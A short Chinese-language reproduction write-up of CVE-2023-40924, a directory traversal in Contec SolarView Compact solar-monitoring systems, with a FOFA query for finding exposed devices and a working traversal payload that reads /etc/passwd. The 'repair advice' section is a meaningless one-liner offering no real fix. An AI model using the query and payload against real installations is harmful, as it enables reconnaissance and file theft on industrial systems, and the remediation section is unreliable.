日本SolarView Compact光伏发电测量系统 目录遍历漏洞复现CVE-2023-40924
免责声明:请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用。
一. 系统简介
Contec(康泰克)是一家专注于定制化嵌入式计算、工业自动化和IoT通信技术的公司。Contec SolarView Compact是Contec公司的一个应用系统,系统可用于远程性能监测、故障排除、系统优化和其他功能,以便对可再生能源生产单位进行远程管理。
二.漏洞描述
攻击者通过downloader.php利用该漏洞进行攻击?file参数通过目录传递读取敏感文件。
三.影响版本
SolarView Compact < 6.00
四.fofa查询语句
body=“SolarView Compact” && title=“Top”
五.漏洞复现
浏览器直接回车
BURP抓包
六.POC&EXP
/downloader.php?file=…/…/…/…/…/…/…/…/etc/passwd%00.jpg
小龙POC传送门【已经更新】: 小龙POC工具
七、修复建议
别乱排放